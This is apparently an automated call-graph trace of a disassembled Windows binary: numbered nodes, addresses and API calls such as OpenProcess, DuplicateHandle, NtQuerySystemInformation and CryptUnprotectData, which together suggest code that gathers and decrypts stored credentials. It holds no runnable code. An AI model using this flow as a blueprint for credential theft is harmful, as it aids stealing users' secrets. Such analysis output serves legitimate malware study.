39081 406294 CloseHandle 39080->39081 39082 406224 39081->39082 39083 4096c3 CreateFileW 39082->39083 39084 40622d 39083->39084 39085 406281 GetLastError 39084->39085 39086 40a2ef ReadFile 39084->39086 39088 40625a 39085->39088 39087 406244 39086->39087 39087->39085 39089 40624b 39087->39089 39088->39016 39091 40dd85 memset 39088->39091 39089->39088 39090 406777 19 API calls 39089->39090 39090->39088 39092 409bca GetModuleFileNameW 39091->39092 39093 40ddbe CreateFileW 39092->39093 39096 40ddf1 39093->39096 39094 40afcf ??2@YAPAXI ??3@YAXPAX 39094->39096 39095 41352f 9 API calls 39095->39096 39096->39094 39096->39095 39097 40de0b NtQuerySystemInformation 39096->39097 39098 40de3b CloseHandle GetCurrentProcessId 39096->39098 39097->39096 39099 40de54 39098->39099 39100 413d4c 47 API calls 39099->39100 39108 40de88 39100->39108 39101 40e00c 39102 413d29 free FreeLibrary 39101->39102 39103 40e014 39102->39103 39103->39016 39103->39019 39104 40dea9 _wcsicmp 39105 40dee7 OpenProcess 39104->39105 39106 40debd _wcsicmp 39104->39106 39105->39108 39106->39105 39107 40ded0 _wcsicmp 39106->39107 39107->39105 39107->39108 39108->39101 39108->39104 39109 40dfef CloseHandle 39108->39109 39110 40df78 39108->39110 39111 40df23 GetCurrentProcess DuplicateHandle 39108->39111 39114 40df8f CloseHandle 39108->39114 39109->39108 39110->39109 39110->39114 39115 40dfae _wcsicmp 39110->39115 39111->39108 39112 40df4c memset 39111->39112 39113 41352f 9 API calls 39112->39113 39113->39108 39114->39110 39115->39108 39115->39110 39117 409a74 GetTempFileNameW 39116->39117 39118 409a66 GetWindowsDirectoryW 39116->39118 39117->39029 39118->39117 39119->39031 39121 406bd5 39120->39121 39122 406bad 39120->39122 39124 4066bf free malloc memcpy free free 39121->39124 39129 406c0f 39121->39129 39122->39121 39123 406bba _wcsicmp 39122->39123 39123->39121 39123->39122 39125 406be5 39124->39125 39126 40afcf ??2@YAPAXI ??3@YAXPAX 39125->39126 39125->39129 39127 406bff 39126->39127 39128 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39127->39128 39128->39129 39129->39040 39129->39041 39132 406ed1 39130->39132 39131 407424 39131->39046 39132->39131 39133 40b633 free 39132->39133 39141 406f4e 39133->39141 39134 406f73 memset 39134->39141 39135 407080 free 39135->39141 39136 40718b 39138 4069df memcpy 39136->39138 39149 40730b 39136->39149 39137 4099f4 malloc memcpy free 39137->39141 39150 4071f1 39138->39150 39139 4069df memcpy 39139->39141 39140 4069df memcpy 39142 4070d4 39140->39142 39141->39134 39141->39135 39141->39137 39141->39139 39141->39142 39143 406a10 memcpy 39141->39143 39144 406aa2 memcpy 39141->39144 39142->39131 39142->39136 39142->39140 39145 40717b 39142->39145 39143->39141 39144->39141 39146 4069df memcpy 39145->39146 39146->39136 39147 406c5a 6 API calls 39147->39149 39148 406c28 ??2@YAPAXI ??3@YAXPAX 39148->39149 39149->39131 39149->39147 39149->39148 39150->39149 39151 4069df memcpy 39150->39151 39151->39150 39153 4069c4 ??3@YAXPAX 39152->39153 39154 4069af 39153->39154 39155 40b633 free 39154->39155 39156 4069ba 39155->39156 39157 40b04b ??3@YAXPAX 39156->39157 39158 4069c2 39157->39158 39158->39012 39159->39046 39160->39046 39161->39046 39162->39071 39164 40aa33 39163->39164 39165 40aa63 39163->39165 39166 40aa44 39164->39166 39167 40aa38 wcslen 39164->39167 39165->39059 39168 40a9ce malloc memcpy free free 39166->39168 39167->39166 39169 40aa4d 39168->39169 39169->39165 39170 40aa51 memcpy 39169->39170 39170->39165 39171->39059 39172->39059 39177 40a980 39173->39177 39174 40a8bb 39174->38919 39174->38920 39175 40a995 _wcsicmp 39175->39177 39176 40a99c wcscmp 39176->39177 39177->39174 39177->39175 39177->39176 39178->38923 39179->38927 39181 40aa23 RegEnumValueW 39180->39181 39181->38934 39181->38935 39183 405335 39182->39183 39184 40522a 39182->39184 39183->38512 39185 40b2cc 27 API calls 39184->39185 39186 405234 39185->39186 39187 40a804 8 API calls 39186->39187 39188 40523a 39187->39188 39227 40b273 39188->39227 39190 405248 _mbscpy _mbscat GetProcAddress 39191 40b273 27 API calls 39190->39191 39192 405279 39191->39192 39230 405211 GetProcAddress 39192->39230 39194 405282 39195 40b273 27 API calls 39194->39195 39196 40528f 39195->39196 39231 405211 GetProcAddress 39196->39231 39198 405298 39199 40b273 27 API calls 39198->39199 39200 4052a5 39199->39200 39232 405211 GetProcAddress 39200->39232 39202 4052ae 39203 40b273 27 API calls 39202->39203 39204 4052bb 39203->39204 39233 405211 GetProcAddress 39204->39233 39206 4052c4 39207 40b273 27 API calls 39206->39207 39208 4052d1 39207->39208 39234 405211 GetProcAddress 39208->39234 39210 4052da 39211 40b273 27 API calls 39210->39211 39212 4052e7 39211->39212 39235 405211 GetProcAddress 39212->39235 39214 4052f0 39215 40b273 27 API calls 39214->39215 39216 4052fd 39215->39216 39236 405211 GetProcAddress 39216->39236 39218 405306 39219 40b273 27 API calls 39218->39219 39220 405313 39219->39220 39237 405211 GetProcAddress 39220->39237 39228 40b58d 27 API calls 39227->39228 39229 40b18c 39228->39229 39229->39190 39230->39194 39231->39198 39232->39202 39233->39206 39234->39210 39235->39214 39236->39218 39240 405220 39 API calls 39239->39240 39241 405369 39240->39241 39241->38952 39241->38953 39242->38955 39243->38959 39244->38956 39245->38953 39247 40440c FreeLibrary 39246->39247 39248 40436d 39247->39248 39249 40a804 8 API calls 39248->39249 39250 404377 39249->39250 39251 404383 39250->39251 39252 404405 39250->39252 39253 40b273 27 API calls 39251->39253 39252->38522 39252->38523 39252->38524 39254 40438d GetProcAddress 39253->39254 39255 40b273 27 API calls 39254->39255 39256 4043a7 GetProcAddress 39255->39256 39257 40b273 27 API calls 39256->39257 39258 4043ba GetProcAddress 39257->39258 39259 40b273 27 API calls 39258->39259 39260 4043ce GetProcAddress 39259->39260 39261 40b273 27 API calls 39260->39261 39262 4043e2 GetProcAddress 39261->39262 39263 4043f1 39262->39263 39264 4043f7 39263->39264 39265 40440c FreeLibrary 39263->39265 39264->39252 39265->39252 39267 404413 FreeLibrary 39266->39267 39268 40441e 39266->39268 39267->39268 39268->38540 39269->38536 39271 40447e 39270->39271 39272 40442e 39270->39272 39273 404485 CryptUnprotectData 39271->39273 39274 40449c 39271->39274 39275 40b2cc 27 API calls 39272->39275 39273->39274 39274->38536 39276 404438 39275->39276 39277 40a804 8 API calls 39276->39277 39278 40443e 39277->39278 39279 404445 39278->39279 39280 404467 39278->39280 39281 40b273 27 API calls 39279->39281 39280->39271 39283 404475 FreeLibrary 39280->39283 39282 40444f GetProcAddress 39281->39282 39282->39280 39284 404460 39282->39284 39283->39271 39284->39280 39286 4135f6 39285->39286 39287 4135eb FreeLibrary 39285->39287 39286->38543 39287->39286 39289 4449c4 39288->39289 39290 444a52 39288->39290 39291 40b2cc 27 API calls 39289->39291 39290->38560 39290->38561 39292 4449cb 39291->39292 39293 40a804 8 API calls 39292->39293 39294 4449d1 39293->39294 39295 40b273 27 API calls 39294->39295 39296 4449dc GetProcAddress 39295->39296 39297 40b273 27 API calls 39296->39297 39298 4449f3 GetProcAddress 39297->39298 39299 40b273 27 API calls 39298->39299 39300 444a04 GetProcAddress 39299->39300 39301 40b273 27 API calls 39300->39301 39302 444a15 GetProcAddress 39301->39302 39309->38571 39310->38571 39311->38571 39312->38571 39313->38562 39315 403a29 39314->39315 39329 403bed memset memset 39315->39329 39317 403ae7 39342 40b1ab free free 39317->39342 39319 403a3f memset 39323 403a2f 39319->39323 39320 403aef 39320->38579 39321 40a8d0 7 API calls 39321->39323 39322 409d1f 6 API calls 39322->39323 39323->39317 39323->39319 39323->39321 39323->39322 39324 409b98 GetFileAttributesW 39323->39324 39324->39323 39326 40a051 GetFileTime CloseHandle 39325->39326 39327 4039ca CompareFileTime 39325->39327 39326->39327 39327->38579 39328->38578 39330 414c2e 17 API calls 39329->39330 39331 403c38 39330->39331 39332 409719 2 API calls 39331->39332 39333 403c3f wcscat 39332->39333 39334 414c2e 17 API calls 39333->39334 39335 403c61 39334->39335 39336 409719 2 API calls 39335->39336 39337 403c68 wcscat 39336->39337 39343 403af5 39337->39343 39340 403af5 20 API calls 39341 403c95 39340->39341 39341->39323 39342->39320 39344 403b02 39343->39344 39345 40ae18 9 API calls 39344->39345 39353 403b37 39345->39353 39346 403bdb 39347 40aebe FindClose 39346->39347 39348 403be6 39347->39348 39348->39340 39349 40ae18 9 API calls 39349->39353 39350 40ae51 9 API calls 39350->39353 39351 40add4 wcscmp wcscmp 39351->39353 39352 40aebe FindClose 39352->39353 39353->39346 39353->39349 39353->39350 39353->39351 39353->39352 39354 40a8d0 7 API calls 39353->39354 39354->39353 39356 409d1f 6 API calls 39355->39356 39357 404190 39356->39357 39370 409b98 GetFileAttributesW 39357->39370 39359 40419c 39360 4041a7 6 API calls 39359->39360 39361 40435c 39359->39361 39362 40424f 39360->39362 39361->38605 39362->39361 39364 40425e memset 39362->39364 39366 409d1f 6 API calls 39362->39366 39367 40a8ab 9 API calls 39362->39367 39371 414842 39362->39371 39364->39362 39365 404296 wcscpy 39364->39365 39365->39362 39366->39362 39368 4042b6 memset memset _snwprintf wcscpy 39367->39368 39368->39362 39369->38603 39370->39359 39374 41443e 39371->39374 39373 414866 39373->39362 39375 41444b 39374->39375 39376 414451 39375->39376 39377 4144a3 GetPrivateProfileStringW 39375->39377 39378 414491 39376->39378 39379 414455 wcschr 39376->39379 39377->39373 39381 414495 WritePrivateProfileStringW 39378->39381 39379->39378 39380 414463 _snwprintf 39379->39380 39380->39381 39381->39373 39382->38609 39384 40b2cc 27 API calls 39383->39384 39385 409615 39384->39385 39386 409d1f 6 API calls 39385->39386 39387 409625 39386->39387 39412 409b98 GetFileAttributesW 39387->39412 39389 409634 39390 409648 39389->39390 39413 4091b8 memset 39389->39413 39392 40b2cc 27 API calls 39390->39392 39395 408801 39390->39395 39393 40965d 39392->39393 39394 409d1f 6 API calls 39393->39394 39396 40966d 39394->39396 39395->38612 39395->38639 39465 409b98 GetFileAttributesW 39396->39465 39398 40967c 39398->39395 39399 409681 39398->39399 39466 409529 72 API calls 39399->39466 39401 409690 39401->39395 39412->39389 39467 40a6e6 WideCharToMultiByte 39413->39467 39415 409202 39468 444432 39415->39468 39418 40b273 27 API calls 39419 409236 39418->39419 39514 438552 39419->39514 39445 40951d 39445->39390 39465->39398 39466->39401 39467->39415 39469 4438b5 11 API calls 39468->39469 39470 44444c 39469->39470 39471 409215 39470->39471 39564 415a6d 39470->39564 39471->39418 39471->39445 39473 4442e6 11 API calls 39475 44469e 39473->39475 39474 444486 39476 4444b9 memcpy 39474->39476 39513 4444a4 39474->39513 39475->39471 39478 443d90 111 API calls 39475->39478 39568 415258 39476->39568 39478->39471 39479 444524 39480 444541 39479->39480 39481 44452a 39479->39481 39571 444316 39480->39571 39482 416935 16 API calls 39481->39482 39482->39513 39513->39473 39685 438460 39514->39685 39516 409240 39565 415a77 39564->39565 39566 415a8d 39565->39566 39567 415a7e memset 39565->39567 39566->39474 39567->39566 39569 4438b5 11 API calls 39568->39569 39570 41525d 39569->39570 39570->39479 39572 444328 39571->39572 39573 444423 39572->39573 39574 44434e 39572->39574 39638 4446ea 11 API calls 39573->39638 39575 432d4e 3 API calls 39574->39575 39697 41703f 39685->39697 39687 43847a 39688 43848a 39687->39688 39689 43847e 39687->39689 39704 438270 39688->39704 39734 4446ea 11 API calls 39689->39734 39696 438488 39696->39516 39698 417044 39697->39698 39699 41705c 39697->39699 39701 416760 11 API calls 39698->39701 39703 417055 39698->39703 39700 417075 39699->39700 39702 41707a 11 API calls 39699->39702 39700->39687 39701->39703 39702->39698 39703->39687 39705 415a91 memset 39704->39705 39706 43828d 39705->39706 39707 438297 39706->39707 39708 438341 39706->39708 39710 4382d6 39706->39710 39734->39696 39835 413f4f 39808->39835 39811 413f37 K32GetModuleFileNameExW 39812 413f4a 39811->39812 39812->38669 39814 413969 wcscpy 39813->39814 39815 41396c wcschr 39813->39815 39825 413a3a 39814->39825 39815->39814 39817 41398e 39815->39817 39840 4097f7 wcslen wcslen _memicmp 39817->39840 39819 41399a 39820 4139a4 memset 39819->39820 39821 4139e6 39819->39821 39841 409dd5 GetWindowsDirectoryW wcscpy 39820->39841 39823 413a31 wcscpy 39821->39823 39824 4139ec memset 39821->39824 39823->39825 39842 409dd5 GetWindowsDirectoryW wcscpy 39824->39842 39825->38669 39826 4139c9 wcscpy wcscat 39826->39825 39828 413a11 memcpy wcscat 39828->39825 39830 413cb0 GetModuleHandleW 39829->39830 39831 413cda 39829->39831 39830->39831 39834 413cbf GetProcAddress 39830->39834 39832 413ce3 GetProcessTimes 39831->39832 39833 413cf6 39831->39833 39832->38675 39833->38675 39834->39831 39836 413f2f 39835->39836 39837 413f54 39835->39837 39836->39811 39836->39812 39838 40a804 8 API calls 39837->39838 39839 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39838->39839 39839->39836 39840->39819 39841->39826 39842->39828 39843->38695 39844->38718 39846 409cf9 GetVersionExW 39845->39846 39847 409d0a 39845->39847 39846->39847 39847->38724 39847->38730 39848->38731 39849->38735 39850->38737 39851->38803 39853 40bba5 39852->39853 39897 40cc26 39853->39897 39856 40bd4b 39918 40cc0c 39856->39918 39861 40b2cc 27 API calls 39862 40bbef 39861->39862 39925 40ccf0 _wcsicmp 39862->39925 39864 40bbf5 39864->39856 39926 40ccb4 6 API calls 39864->39926 39866 40bc26 39867 40cf04 17 API calls 39866->39867 39868 40bc2e 39867->39868 39869 40bd43 39868->39869 39870 40b2cc 27 API calls 39868->39870 39871 40cc0c 4 API calls 39869->39871 39872 40bc40 39870->39872 39871->39856 39927 40ccf0 _wcsicmp 39872->39927 39874 40bc46 39874->39869 39875 40bc61 memset memset WideCharToMultiByte 39874->39875 39928 40103c strlen 39875->39928 39877 40bcc0 39878 40b273 27 API calls 39877->39878 39879 40bcd0 memcmp 39878->39879 39879->39869 39880 40bce2 39879->39880 39881 404423 38 API calls 39880->39881 39882 40bd10 39881->39882 39882->39869 39883 40bd3a LocalFree 39882->39883 39884 40bd1f memcpy 39882->39884 39883->39869 39884->39883 39885->38818 39886->38855 39887->38855 39888->38855 39889->38855 39890->38855 39891->38855 39892->38855 39893->38855 39894->38855 39895->38830 39896->38852 39929 4096c3 CreateFileW 39897->39929 39899 40cc34 39900 40cc3d GetFileSize 39899->39900 39908 40bbca 39899->39908 39901 40afcf 2 API calls 39900->39901 39902 40cc64 39901->39902 39930 40a2ef ReadFile 39902->39930 39904 40cc71 39931 40ab4a MultiByteToWideChar 39904->39931 39906 40cc95 CloseHandle 39907 40b04b ??3@YAXPAX 39906->39907 39907->39908 39908->39856 39909 40cf04 39908->39909 39910 40b633 free 39909->39910 39911 40cf14 39910->39911 39937 40b1ab free free 39911->39937 39913 40cf1b 39915 40cfef 39913->39915 39917 40bbdd 39913->39917 39938 40cd4b 39913->39938 39916 40cd4b 14 API calls 39915->39916 39916->39917 39917->39856 39917->39861 39919 40b633 free 39918->39919 39920 40cc15 39919->39920 39921 40aa04 free 39920->39921 39922 40cc1d 39921->39922 39979 40b1ab free free 39922->39979 39924 40b7d4 memset CreateFileW 39924->38810 39924->38811 39925->39864 39926->39866 39927->39874 39928->39877 39929->39899 39930->39904 39932 40ab93 39931->39932 39933 40ab6b 39931->39933 39932->39906 39934 40a9ce 4 API calls 39933->39934 39935 40ab74 39934->39935 39936 40ab7c MultiByteToWideChar 39935->39936 39936->39932 39937->39913 39939 40cd7b 39938->39939 39940 40aa29 6 API calls 39939->39940 39944 40cd89 39940->39944 39941 40cef5 39942 40aa04 free 39941->39942 39943 40cefd 39942->39943 39943->39913 39944->39941 39945 40aa29 6 API calls 39944->39945 39946 40ce1d 39945->39946 39947 40aa29 6 API calls 39946->39947 39948 40ce3e 39947->39948 39949 40ce6a 39948->39949 39972 40abb7 wcslen memmove 39948->39972 39950 40ce9f 39949->39950 39975 40abb7 wcslen memmove 39949->39975 39953 40a8d0 7 API calls 39950->39953 39956 40ceb5 39953->39956 39954 40ce56 39973 40aa71 wcslen 39954->39973 39955 40ce8b 39976 40aa71 wcslen 39955->39976 39960 40a8d0 7 API calls 39956->39960 39959 40ce5e 39974 40abb7 wcslen memmove 39959->39974 39963 40cecb 39960->39963 39961 40ce93 39977 40abb7 wcslen memmove 39961->39977 39978 40d00b malloc memcpy free free 39963->39978 39966 40cedd 39967 40aa04 free 39966->39967 39968 40cee5 39967->39968 39969 40aa04 free 39968->39969 39970 40ceed 39969->39970 39971 40aa04 free 39970->39971 39971->39941 39972->39954 39973->39959 39974->39949 39975->39955 39976->39961 39977->39950 39978->39966 39979->39924 39980->38870 39981->38878 39982 442774 39983 442799 39982->39983 39984 44277b 39982->39984 40007 42bf4c 14 API calls 39983->40007 39999 42b63e 39984->39999 39988 4427a5 40008 42bfcf memcpy 39988->40008 39991 4427ba 40009 42c00a 11 API calls 39991->40009 39993 441897 39994 4418ea 39993->39994 39995 442bd4 39993->39995 39996 4418e2 39993->39996 39995->39994 40011 441409 memset 39995->40011 39996->39994 40010 4414a9 12 API calls 39996->40010 40012 42b4ec 39999->40012 40001 42b64c 40018 42b5e4 40001->40018 40003 42b65e 40004 42b66d 40003->40004 40025 42b3c6 11 API calls 40003->40025 40006 42b1b5 17 API calls 40004->40006 40006->39983 40007->39988 40008->39991 40009->39993 40010->39994 40011->39995 40015 42b4ff 40012->40015 40013 415a91 memset 40014 42b52c 40013->40014 40016 42b553 memcpy 40014->40016 40017 42b545 40014->40017 40015->40013 40016->40017 40017->40001 40019 42b5eb 40018->40019 40023 42b604 40018->40023 40026 42b896 memset 40019->40026 40021 42b5f5 40027 42b896 memset 40021->40027 40023->40003 40024 42b5ff 40024->40003 40025->40004 40026->40021 40027->40024 40028 4147f3 40031 414561 40028->40031 40030 414813 40032 41456d 40031->40032 40033 41457f GetPrivateProfileIntW 40031->40033 40036 4143f1 memset _itow WritePrivateProfileStringW 40032->40036 40033->40030 40035 41457a 40035->40030 40036->40035 40037 44def7 40038 44df07 40037->40038 40039 44df00 ??3@YAXPAX 40037->40039 40040 44df17 40038->40040 40041 44df10 ??3@YAXPAX 40038->40041 40039->40038 40042 44df27 40040->40042 40043 44df20 ??3@YAXPAX 40040->40043 40041->40040 40044 44df37 40042->40044 40045 44df30 ??3@YAXPAX 40042->40045 40043->40042 40045->40044 40046 4148b6 FindResourceW 40047 4148cf SizeofResource 40046->40047 40050 4148f9 40046->40050 40048 4148e0 LoadResource 40047->40048 40047->40050 40049 4148ee LockResource 40048->40049 40048->40050 40049->40050 40051 441b3f 40061 43a9f6 40051->40061 40053 441b61 40234 4386af memset 40053->40234 40055 44189a 40056 442bd4 40055->40056 40057 4418e2 40055->40057 40058 4418ea 40056->40058 40236 441409 memset 40056->40236 40057->40058 40235 4414a9 12 API calls 40057->40235 40062 43aa20 40061->40062 40063 43aadf 40061->40063 40062->40063 40064 43aa34 memset 40062->40064 40063->40053 40065 43aa56 40064->40065 40066 43aa4d 40064->40066 40237 43a6e7 40065->40237 40245 42c02e memset 40066->40245 40071 43aad3 40247 4169a7 11 API calls 40071->40247 40072 43aaae 40072->40063 40072->40071 40087 43aae5 40072->40087 40074 43ac18 40076 43ac47 40074->40076 40249 42bbd5 memcpy memcpy memcpy memset memcpy 40074->40249 40077 43aca8 40076->40077 40250 438eed 16 API calls 40076->40250 40081 43acd5 40077->40081 40252 4233ae 11 API calls 40077->40252 40080 43ac87 40251 4233c5 16 API calls 40080->40251 40253 423426 11 API calls 40081->40253 40085 43ace1 40254 439811 164 API calls 40085->40254 40086 43a9f6 162 API calls 40086->40087 40087->40063 40087->40074 40087->40086 40248 439bbb 22 API calls 40087->40248 40089 43acfd 40095 43ad2c 40089->40095 40255 438eed 16 API calls 40089->40255 40091 43ad19 40256 4233c5 16 API calls 40091->40256 40093 43ad58 40257 44081d 164 API calls 40093->40257 40095->40093 40097 43add9 40095->40097 40097->40097 40261 423426 11 API calls 40097->40261 40098 43ae3a memset 40099 43ae73 40098->40099 40262 42e1c0 148 API calls 40099->40262 40100 43adab 40259 438c4e 164 API calls 40100->40259 40102 43ad6c 40102->40063 40102->40100 40258 42370b memset memcpy memset 40102->40258 40104 43ae96 40263 42e1c0 148 API calls 40104->40263 40106 43adcc 40260 440f84 12 API calls 40106->40260 40109 43aea8 40110 43aec1 40109->40110 40264 42e199 148 API calls 40109->40264 40112 43af00 40110->40112 40265 42e1c0 148 API calls 40110->40265 40112->40063 40115 43af1a 40112->40115 40116 43b3d9 40112->40116 40266 438eed 16 API calls 40115->40266 40121 43b3f6 40116->40121 40128 43b4c8 40116->40128 40118 43b60f 40118->40063 40325 4393a5 17 API calls 40118->40325 40119 43af2f 40267 4233c5 16 API calls 40119->40267 40307 432878 12 API calls 40121->40307 40123 43af51 40268 423426 11 API calls 40123->40268 40126 43af7d 40269 423426 11 API calls 40126->40269 40127 43b4f2 40314 43a76c 21 API calls 40127->40314 40128->40127 40313 42bbd5 memcpy memcpy memcpy memset memcpy 40128->40313 40132 43b529 40315 44081d 164 API calls 40132->40315 40133 43b428 40161 43b462 40133->40161 40308 432b60 16 API calls 40133->40308 40134 43af94 40270 423330 11 API calls 40134->40270 40138 43b47e 40147 43b497 40138->40147 40310 42374a memcpy memset memcpy memcpy memcpy 40138->40310 40139 43b544 40149 43b55c 40139->40149 40316 42c02e memset 40139->40316 40140 43afca 40271 423330 11 API calls 40140->40271 40145 43afdb 40272 4233ae 11 API calls 40145->40272 40311 4233ae 11 API calls 40147->40311 40148 43b4b1 40312 423399 11 API calls 40148->40312 40317 43a87a 164 API calls 40149->40317 40151 43b56c 40154 43b58a 40151->40154 40318 423330 11 API calls 40151->40318 40153 43afee 40273 44081d 164 API calls 40153->40273 40319 440f84 12 API calls 40154->40319 40156 43b4c1 40321 42db80 164 API calls 40156->40321 40160 43b592 40320 43a82f 16 API calls 40160->40320 40309 423330 11 API calls 40161->40309 40164 43b5b4 40322 438c4e 164 API calls 40164->40322 40166 43b5cf 40323 42c02e memset 40166->40323 40168 43b005 40168->40063 40173 43b01f 40168->40173 40274 42d836 164 API calls 40168->40274 40169 43b1ef 40284 4233c5 16 API calls 40169->40284 40171 43b212 40285 423330 11 API calls 40171->40285 40173->40169 40282 423330 11 API calls 40173->40282 40283 42d71d 164 API calls 40173->40283 40175 43add4 40175->40118 40324 438f86 16 API calls 40175->40324 40178 43b087 40275 4233ae 11 API calls 40178->40275 40179 43b22a 40286 42ccb5 11 API calls 40179->40286 40182 43b10f 40278 423330 11 API calls 40182->40278 40183 43b23f 40287 4233ae 11 API calls 40183->40287 40185 43b257 40288 4233ae 11 API calls 40185->40288 40189 43b129 40279 4233ae 11 API calls 40189->40279 40190 43b26e 40289 4233ae 11 API calls 40190->40289 40192 43b09a 40192->40182 40276 42cc15 19 API calls 40192->40276 40277 4233ae 11 API calls 40192->40277 40194 43b282 40290 43a87a 164 API calls 40194->40290 40196 43b13c 40280 440f84 12 API calls 40196->40280 40198 43b29d 40291 423330 11 API calls 40198->40291 40201 43b15f 40281 4233ae 11 API calls 40201->40281 40202 43b2af 40204 43b2b8 40202->40204 40205 43b2ce 40202->40205 40292 4233ae 11 API calls 40204->40292 40293 440f84 12 API calls 40205->40293 40208 43b2c9 40295 4233ae 11 API calls 40208->40295 40209 43b2da 40294 42370b memset memcpy memset 40209->40294 40212 43b2f9 40296 423330 11 API calls 40212->40296 40214 43b30b 40297 423330 11 API calls 40214->40297 40216 43b325 40298 423399 11 API calls 40216->40298 40218 43b332 40299 4233ae 11 API calls 40218->40299 40220 43b354 40300 423399 11 API calls 40220->40300 40222 43b364 40301 43a82f 16 API calls 40222->40301 40224 43b370 40302 42db80 164 API calls 40224->40302 40226 43b380 40303 438c4e 164 API calls 40226->40303 40228 43b39e 40304 423399 11 API calls 40228->40304 40230 43b3ae 40305 43a76c 21 API calls 40230->40305 40232 43b3c3 40306 423399 11 API calls 40232->40306 40234->40055 40235->40058 40236->40056 40238 43a6f5 40237->40238 40239 43a765 40237->40239 40238->40239 40326 42a115 40238->40326 40239->40063 40246 4397fd memset 40239->40246 40243 43a73d 40243->40239 40244 42a115 148 API calls 40243->40244 40244->40239 40245->40065 40246->40072 40247->40063 40248->40087 40249->40076 40250->40080 40251->40077 40252->40081 40253->40085 40254->40089 40255->40091 40256->40095 40257->40102 40258->40100 40259->40106 40260->40175 40261->40098 40262->40104 40263->40109 40264->40110 40265->40110 40266->40119 40267->40123 40268->40126 40269->40134 40270->40140 40271->40145 40272->40153 40273->40168 40274->40178 40275->40192 40276->40192 40277->40192 40278->40189 40279->40196 40280->40201 40281->40173 40282->40173 40283->40173 40284->40171 40285->40179 40286->40183 40287->40185 40288->40190 40289->40194 40290->40198 40291->40202 40292->40208 40293->40209 40294->40208 40295->40212 40296->40214 40297->40216 40298->40218 40299->40220 40300->40222 40301->40224 40302->40226 40303->40228 40304->40230 40305->40232 40306->40175 40307->40133 40308->40161 40309->40138 40310->40147 40311->40148 40312->40156 40313->40127 40314->40132 40315->40139 40316->40149 40317->40151 40318->40154 40319->40160 40320->40156 40321->40164 40322->40166 40323->40175 40324->40118 40325->40063 40327 42a175 40326->40327 40329 42a122 40326->40329 40327->40239 40332 42b13b 148 API calls 40327->40332 40329->40327 40330 42a115 148 API calls 40329->40330 40333 43a174 40329->40333 40357 42a0a8 148 API calls 40329->40357 40330->40329 40332->40243 40347 43a196 40333->40347 40348 43a19e 40333->40348 40334 43a306 40334->40347 40373 4388c4 14 API calls 40334->40373 40337 42a115 148 API calls 40337->40348 40338 415a91 memset 40338->40348 40339 43a642 40339->40347 40376 4169a7 11 API calls 40339->40376 40343 43a635 40375 42c02e memset 40343->40375 40347->40329 40348->40334 40348->40337 40348->40338 40348->40347 40358 42ff8c 40348->40358 40366 4165ff 40348->40366 40369 439504 13 API calls 40348->40369 40370 4312d0 148 API calls 40348->40370 40371 42be4c memcpy memcpy memcpy memset memcpy 40348->40371 40372 43a121 11 API calls 40348->40372 40350 43a325 40350->40339 40350->40343 40350->40347 40351 4169a7 11 API calls 40350->40351 40352 42b5b5 memset memcpy 40350->40352 40353 42bf4c 14 API calls 40350->40353 40354 42b63e 14 API calls 40350->40354 40356 4165ff 11 API calls 40350->40356 40374 42bfcf memcpy 40350->40374 40351->40350 40352->40350 40353->40350 40354->40350 40356->40350 40357->40329 40377 43817e 40358->40377 40360 42ff99 40361 42ffe3 40360->40361 40362 42ffd0 40360->40362 40365 42ff9d 40360->40365 40382 4169a7 11 API calls 40361->40382 40381 4169a7 11 API calls 40362->40381 40365->40348 40367 4165a0 11 API calls 40366->40367 40368 41660d 40367->40368 40368->40348 40369->40348 40370->40348 40371->40348 40372->40348 40373->40350 40374->40350 40375->40339 40376->40347 40378 438187 40377->40378 40380 438192 40377->40380 40383 4380f6 40378->40383 40380->40360 40381->40365 40382->40365 40385 43811f 40383->40385 40384 438164 40384->40380 40385->40384 40387 4300e8 3 API calls 40385->40387 40388 437e5e 40385->40388 40387->40385 40411 437d3c 40388->40411 40390 437eb3 40390->40385 40391 437ea9 40391->40390 40396 437f22 40391->40396 40426 41f432 40391->40426 40394 437f06 40474 415c56 11 API calls 40394->40474 40398 437f7f 40396->40398 40399 432d4e 3 API calls 40396->40399 40397 437f95 40475 415c56 11 API calls 40397->40475 40398->40397 40401 43802b 40398->40401 40399->40398 40402 4165ff 11 API calls 40401->40402 40403 438054 40402->40403 40437 437371 40403->40437 40406 43806b 40407 438094 40406->40407 40476 42f50e 139 API calls 40406->40476 40409 437fa3 40407->40409 40410 4300e8 3 API calls 40407->40410 40409->40390 40477 41f638 104 API calls 40409->40477 40410->40409 40412 437d69 40411->40412 40415 437d80 40411->40415 40478 437ccb 11 API calls 40412->40478 40414 437d76 40414->40391 40415->40414 40416 437d90 40415->40416 40417 437da3 40415->40417 40416->40414 40482 437ccb 11 API calls 40416->40482 40419 438460 134 API calls 40417->40419 40422 437dcb 40419->40422 40421 437de8 40481 424f26 123 API calls 40421->40481 40422->40421 40479 444283 13 API calls 40422->40479 40424 437dfc 40480 437ccb 11 API calls 40424->40480 40427 41f54d 40426->40427 40433 41f44f 40426->40433 40428 41f466 40427->40428 40512 41c635 memset memset 40427->40512 40428->40394 40428->40396 40433->40428 40435 41f50b 40433->40435 40483 41f1a5 40433->40483 40508 41c06f memcmp 40433->40508 40509 41f3b1 90 API calls 40433->40509 40510 41f398 86 API calls 40433->40510 40435->40427 40435->40428 40511 41c295 86 API calls 40435->40511 40438 41703f 11 API calls 40437->40438 40439 437399 40438->40439 40440 43739d 40439->40440 40443 4373ac 40439->40443 40514 4446ea 11 API calls 40440->40514 40442 4373a7 40442->40406 40444 416935 16 API calls 40443->40444 40445 4373ca 40444->40445 40447 438460 134 API calls 40445->40447 40451 4251c4 137 API calls 40445->40451 40455 415a91 memset 40445->40455 40458 43758f 40445->40458 40470 437584 40445->40470 40473 437d3c 135 API calls 40445->40473 40513 415308 free 40445->40513 40515 425433 13 API calls 40445->40515 40516 425413 17 API calls 40445->40516 40517 42533e 16 API calls 40445->40517 40518 42538f 16 API calls 40445->40518 40519 42453e 123 API calls 40445->40519 40446 4375bc 40449 415c7d 16 API calls 40446->40449 40447->40445 40450 4375d2 40449->40450 40450->40442 40452 4442e6 11 API calls 40450->40452 40451->40445 40453 4375e2 40452->40453 40453->40442 40522 444283 13 API calls 40453->40522 40455->40445 40520 42453e 123 API calls 40458->40520 40459 4375f4 40464 437620 40459->40464 40465 43760b 40459->40465 40463 43759f 40466 416935 16 API calls 40463->40466 40468 416935 16 API calls 40464->40468 40523 444283 13 API calls 40465->40523 40466->40470 40468->40442 40470->40446 40521 42453e 123 API calls 